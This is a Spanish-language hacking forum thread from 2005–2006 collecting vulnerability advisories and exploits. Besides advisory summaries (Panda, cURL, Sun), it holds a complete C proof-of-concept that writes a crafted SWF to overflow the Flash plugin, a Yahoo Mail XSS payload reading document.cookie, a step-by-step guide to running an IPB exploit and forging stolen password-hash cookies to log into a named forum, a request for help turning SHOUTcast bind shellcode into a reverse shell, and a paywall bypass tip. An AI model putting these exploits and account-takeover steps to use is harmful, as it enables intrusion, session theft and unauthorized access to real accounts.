 Autor
|
Tema: Recopilatorio de Exploits Interesantes (-Actualizando-) (Leído 52375 veces)
|
JeRoS
 Desconectado
Mensajes: 736
|
Buffer Overflow al descomprimir archivos ZOO en Panda Antivirus. -------------------------------------------------------------------------------- Se reportó una vulnerabilidad en Panda Antivirus, que podría explotarse para comprometer un sistema vulnerable. Fecha de Liberación: 30 de Noviembre de 2005 Ultima Revisión: 30 de Noviembre de 2005 Fuente: Alex Wheleer Sistemas Afectados - Panda Antivirus == Enterprise
Panda Antivirus == Platinum
Panda Antivirus == Small Bussines
Riesgo
Altamente Crítico
Problema de Vulnerabilidad
Remoto
Tipo de Vulnerabilidad
Buffer Overflow Descripción Alex Wheeler reportó una vulnerabilidad en Panda Antivirus, que podría explotarse por personas maliciosas para comprometer un sistema vulnerable. La vulnerabilidad es ocasionada por un error en el control de los límites de la memoria dentro de "pskcmp.dll" cuando realizá una descompresión Lempel-Ziv de archivos ZOO. Esto puede explotarse para ocasionar un desbordamiento de memoria en el heap y podría permitir la ejecución de código arbitrario cuando se analiza un archivo ZOO malicioso. Los siguientes son productos de Panda afectados por esta vulnerabilidad: Panda AntiVirus Enterprise Suite
Panda AntiVirus Platinum 7.x
Panda AntiVirus Small Business Edition
Panda AntiVirus Titanium
Panda CommandlineSecure Antivirus
Panda CVPSecure Antivirus
Panda DominoSecure Antivirus
Panda ExchangeSecure Antivirus
Panda FileSecure Antivirus
Panda ISASecure Antivirus
Panda PerimeterScan
Panda PostfixSecure Antivirus
Panda ProxySecure Antivirus
Panda QmailSecure Antivirus
Panda SendmailSecure Antivirus Impacto Acceso al sistema. Solución Filtrar los archivos ZOO de correos electrónicos o vía proxys. Apéndices http://www.rem0te.com/public/images/panda.pdf |
|
|
|
|
En línea
|
Podran imitar a elhacker.net, pero igualarlo jamas... jajaja
|
|
|
JeRoS
Desconectado
Mensajes: 736
|
Advisory ID : FrSIRT/ADV-2005-2317
CVE ID : CVE-2005-2628
Rated as : Critical
Note : This proof-of-concept exploit generates a flash file that will cause a DoS/* * ********************************************************* * * Macromedia Flash Plugin - Buffer Overflow in flash.ocx * * ********************************************************* * * Version: v7.0.19.0 * * PoC coded by: BassReFLeX * * Date: 11 Oct 2005 * * ********************************************************* * */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void usage(char* file);
/*
<swf>
...
</swf>
*/
char SWF[] = "<swf>";
char SWF_[] = "</swf>";
//[SetBackgroundColor]
char SetBackgroundColor[] = "\x43\x02\xff\x00\x00";
//[DoAction] 1 pwn j00r 455!
char DoAction[] =
"\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00"
"\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43"
"\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45"
"\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00";
//[ShowFrame]
char ShowFrame[] = "\x40\x00";
//[End]
char End[] = "\x00\x00";
int main(int argc,char* argv[])
{
system("cls");
printf("\n* ********************************************************* *");
printf("\n* Macromedia Flash Plugin - Buffer Overflow in flash.ocx *");
printf("\n* ********************************************************* *");
printf("\n* Version: v7.0.19.0 *");
printf("\n* Date: 11 Oct 2005 *");
printf("\n* ProofOfConcept(POC) coded by: BassReFLeX *");
printf("\n* ********************************************************* *");
if ( argc!=2 )
{
usage(argv[0]);
}
FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFile couldn't open!");
exit(1);
}
printf("\n\nWriting crafted .swf file . . .");
fwrite(SWF,1,sizeof(SWF),f);
fwrite("\n",1,1,f);
fwrite(SetBackgroundColor,1,sizeof(SetBackgroundColor),f);
fwrite("\n",1,1,f);
fwrite(DoAction,1,sizeof(DoAction),f);
fwrite("\n",1,1,f);
fwrite(ShowFrame,1,sizeof(ShowFrame),f);
fwrite("\n",1,1,f);
fwrite(End,1,sizeof(End),f);
fwrite("\n",1,1,f);
fwrite(SWF_,1,sizeof(SWF_),f);
printf("\nFile created successfully!");
printf("\nFilename: %s",argv[1]);
return 0;
}
void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .swf crafted file. Eg: overflow.swf");
exit(1);
}
Fuente: http://www.frsirt.com/exploits/20051118.Flashosx.c.php
|
|
|
|
|
En línea
|
Podran imitar a elhacker.net, pero igualarlo jamas... jajaja
|
|
|
BenRu
The Prodigy
Colaborador
Desconectado
Mensajes: 3.843
Primero la música y luego las palabras...
|
|
|
|
|
|
En línea
|
De vacaciones hasta Septiembre  |
|
|
BenRu
The Prodigy
Colaborador
Desconectado
Mensajes: 3.843
Primero la música y luego las palabras...
|
|
|
|
|
|
En línea
|
De vacaciones hasta Septiembre |
|
|
BenRu
The Prodigy
Colaborador
Desconectado
Mensajes: 3.843
Primero la música y luego las palabras...
|
Las versiones de "cURL" no actualizadas contienen una vulnerabilidad que permite que un atacante ejecute código arbitrario bajo los privilegios del proceso que utilice "cURL". "cURL" es una librería y herramienta para descargar ficheros por Gopher, FTP, FTPs, HTTP, HTTPs, telnet, DICT, FILE y LDAP. El problema reside en la rutina de gestión de URLs. Si un atacante proporciona a la librería una URL excesivamente larga, puede provocar un desbordamiendo de búfer y la ejecución de código arbitrario con los privilegios del proceso atacado. El ataque puede desarrollarse de dos maneras posibles, compatibles, por lo que pueden utilizarse de forma simultanea. Aunque el desbordamiento de búfer es muy limitado y parece difícil de explotar para provocar la ejecución de código arbitrario, no debe descartarse. Por ello, Hispasec recomienda a todos los usuarios de "cURL" que actualicen cuanto antes a la versión 7.15.1, sobre todo si utilizan plataformas "little endian", como x86. La vulnerabilidad afecta, por supuesto, a los programas que utilicen la librería "libcurl". Los programas enlazados de forma dinámica con la librería deben ser reiniciados, para que empleen la versión correcta. Los programas que se enlacen de forma estática deben ser recompilados/reenlazados. Las versiones afectadas son de la 7.11.2 a la 7.15.0, inclusive. Más Información: libcurl URL Buffer Overflow http://curl.haxx.se/docs/security.html#20051207Security Advisory December 7th 2005 http://curl.haxx.se/docs/adv_20051207.htmlcURL http://curl.haxx.se/ Fuente: www.hispasec.com |
|
|
|
|
En línea
|
De vacaciones hasta Septiembre |
|
|
BenRu
The Prodigy
Colaborador
Desconectado
Mensajes: 3.843
Primero la música y luego las palabras...
|
Sun ha anunciado la existencia de una vulnerabilidad en Sun Update Connection, que puede ser explotada por usuarios locales maliciosos para descubrir información sensible. La vulnerabilidad está provocada por un error, del que no se han facilitado detalles, que permite a usuarios locales conseguir la contraseña del proxy web configurado. La contraseña del proxy también es visible en los archivos de log del proxy web en el servidor. La explotación exitosa requiere que Sun Update Connection esté configurado para usar un proxy web con contraseña de autenticación. Sun ha confirmado el problema en plataformas Solaris 10 tanto en SPARC como x86. Se han publicado los siguientes parches para solucionarlo: Para plataforma SPARC: http://sunsolve.sun.com/pub-cgi/pdownload.pl?target=119107 Para plataforma x86: http://sunsolve.sun.com/pub-cgi/pdownload.pl?target=119108-04 Más Información: Solaris 10 Sun Update Connection Web Proxy Password Disclosure Vulnerability http://sunsolve.sun.com/search/document.do?assetkey=1-26-102090-1 Fuente: www.hispasec.com |
|
|
|
|
En línea
|
De vacaciones hasta Septiembre |
|
|
|
|
mousehack
Desconectado
Mensajes: 1.146
Ex-Colaborador....!!!!!!XD
|
|
|
|
|
|
En línea
|
|
|
|
mousehack
Desconectado
Mensajes: 1.146
Ex-Colaborador....!!!!!!XD
|
|
|
|
|
|
En línea
|
|
|
|
mousehack
Desconectado
Mensajes: 1.146
Ex-Colaborador....!!!!!!XD
|
Dos vulnerabilidades XSS fueron identificadas en el sitio web Google.com, que permite a un atacante suplantar a los miembros legítimos de los servicios de Google o montar un ataque de phishing. Aunque Google use defensas contra el XSS, un ataque es posible, usando ¨UTF-7 encoded payloads¨. <span style="font-weight: bold;">Google's URL redireccion script</span> ---------------------------------- El script ( http://www.google.com/url?q=...) es usado normalmente para redireccionar el navegador desde el sitio de GOOGLE ,a otros sitios.Por ejemplo: http://www.google.com/url?q=http://www.elhacker.net.comCuándo en el parametro (Q) es introducida una escritura con formato ilegal (El formato parece ser: http: //domain), una pagina "403 Forbidden",regresa al usuario, informando que la pregunta era ilegal. El valor del parámetro con el error aparece en el HTML vuelto al usuario. Cuando solicitamos algo como esto: http://www.google.com/url?q=USER_INPUTobtenemos como respuesta: "403 Forbidden" "Your client does not have permission to get URL /url?q=USER_INPUT from this server." La respuesta del servidor ignora la codificación del charset, por ejemplo: * Response headers: " Content - Type: text / html; charset = [ encoding ] ".
* Response body: "< meta http-equiv = " Content-Type" (...)
charset = [ encoding ]/ >".
Google's 404 NOT FOUND mechanism ------------------------------------------ Al solicitar una página que no existe en www.google.com, una pagina con la respuesta ¨404 NOT FOUND¨ se devuelve al usuario, con la trayectoria original solicitada. Si solicitamos: http://www.google.com/NOTFOUNDel siguiente texto aparece en la respuesta:¨"Not Found The requested URL /NOTFOUND was not found on this server." La respuesta del servidor ignora la codificación del charset, por ejemplo: * Response headers: "Content-Type: text/html; charset=[encoding]".
* Response body: " < meta http - equiv = " Content - Type " (...)
charset = [ encoding ] / > ".
Vulnerabilidad XSS --------------------- Mientras que los mecanismos ya mencionados ( (URL redirection script, 404 NOT FOUND) caracteres comunes del escape usados para XSS, por ejemplo < >(paréntesis triangulares) y apóstrofes, no puede dirigir ¨UTF-7 encoded payloads¨ peligrosas. Por lo tanto, al enviar un payloads en un ataque de XSS, codificado en UTF-7, el payloads volverá con la respuesta sin ser alterado. Para que el ataque tenga existo (script execution), el browser de las victimas debe permitir la carga de XSS como UTF-7. IE:auto-seleccion de codificacion ------------------------------------ Si la ' codificación ' se fija en ' Auto-Select', y el Internet-Explorador encuentra la Secuencia UTF-7 en los primeros 4096 caracteres del cuerpo de la respuesta, fijará el charset que codifica a UTF-7 automáticamente. Esta característica de seleccion de codificación automática permite montar Ataques de UTF-7 XSS contra Google.COM. Fuente:http://www.watchfire.com/ EDIT:este ¨bug¨ ya fue parcheado por google con fecha 01/12/05 salu2 Boys! y Felicidades... |
|
|
|
|
En línea
|
|
|
|
mousehack
Desconectado
Mensajes: 1.146
Ex-Colaborador....!!!!!!XD
|
El filtro del correo de Yahoo no puede detectar script attributes conjuntamente con style attribute como etiqueta, dejando a cada uno que usa el servicio de correo del yahoo con MSIE,vulnerable a XSS,incluyendo el robo de cookies. Esto es una vulnerabilidad de la seguridad del alto riesgo porque el atacante no tendrá que hacer que la víctima ingrese en ningun enlace, todos lo que tiene que hacer es enviar el código del Javascript como email HTML a la victima, y una vez que la víctima abra el email el código será ejecutado adentro de su browser. Esto permitirá el hurto de la cookie de sesion, dando el atacante la posibilidad de que tenga acceso a el mail de la víctima por cerca de 24 horas (hasta que la cookie expira). Codigo <style onload="alert('Yahoo mail !, click OK ahora usted ve su cookie ;)');alert(document.cookie)"></style> fuente:Indian-Hackers Salu2 boys! y felicidades... |
|
|
|
|
En línea
|
|
|
|
mousehack
Desconectado
Mensajes: 1.146
Ex-Colaborador....!!!!!!XD
|
|
|
|
|
« Última modificación: 05 Enero 2006, 12:22 por mousehack »
|
En línea
|
|
|
|
kapocris
Desconectado
Mensajes: 1
|
# danica jones < danica6699@gmail.com> Tutorial for the recent exploit released by Petey Beege. 1. Get the exploit from http://www.milw0rm.com/id.php?id=10132. Make sure you have LWP::UserAgent perl module if not do this: a. perl -MCPAN -e 'shell' b. inside the perl shell, do this 'install LWP::UserAgent' 3. Run the exploit. Get the password hash for the desired login id ex. inv.pl http://forums.elitesite.com 2 2 Where 2 is the login id and 2 for version 2 of IPB. 4. Open wordpad. Edit Mozilla Firefox's cookie file. Mine is located at C:\Documents and Settings\the1\Application Data\Mozilla\Firefox\Profiles\vspyhjb9.default\cookies.txt" Add the following entries: forums.elitesite.com FALSE / FALSE 1148708747 member_id 1 forums.elitesite.com FALSE / FALSE 1148708747 pass_hash ecb735f70028a9cdb819828f4aced78c Notice the value of member_id and pass_hash taken from the values generated by the exploit. 5. Fire up Mozilla Firefox and login to http://forums.elitesite.comEnjoy! # milw0rm.com [2005-05-27] |
|
|
|
« Última modificación: 27 Enero 2006, 01:24 por Sirdarckcat »
|
En línea
|
|
|
|
grx0
Desconectado
Mensajes: 85
|
Hola gente, aqui posteo el nuevo exploit para que lo estudien y prueben. Yo lo he probado y en el 20% de los host teoricamente vulnerables (osea 1.9.4 Linux) funciono, el tema es que el shellcode solo hace un bind, esto quiere decir que espera una conexion remota al port 7000, y algo a tener en cuenta es que los server importantes de Radio que usan Shoucast tienen firewall o estan en LANs , lo que impide o dificulta que el mismo espere una conexion, en otros casos vi que el port 7000 estaba filtrado, pero en port mas altos podria andar. La idea es modificar el exploit de forma que haga un bind reverso. Esto solucionaria el problema.. Por lo que use un shellcode de Metasploit y no tube mucho exito, aver si alguien me ayuda un poco. Exploit: http://www.frsirt.com/exploits/20060128.shoutcast_expl.c.phpSalu2 |
|
|
|
|
En línea
|
|
|
|
ZerO_HacK
Desconectado
Mensajes: 1
|
Hola, este no es un xploit ni nada parecido, es una web que encontre y como estamos repletos de informaticos que no saben manejar los chmod... hemm.. dense cuenta ustedes mismos. Esta es la web, busquen un archivo. http://www.archivosp?.???/ Luego una vez que presionaron bajar archivo, te tira a una web donde debes introducir el codigo enviando un mensaje.. Es ahí donde vas a esta web: http://www.downloads.archivosp?.???/bajar/prueba12390.php Y simple.. Presionas el link que dice "Enviar SMS" y te dara un codigo similar a este 4AC7784. luego vas a la web, introduces el codigo y listo. ves que facil.. Ya suerte y luego les muestro otra cosita que encontre!. Saludos ZerO_HacK ***EDITADO***--Sirdarckcat-- perdon no podemos dar información de terceros, lo edite un poco.. Saludos!! |
|
|
|
« Última modificación: 08 Febrero 2006, 01:47 por Sirdarckcat »
|
En línea
|
|
|
|
|
 |
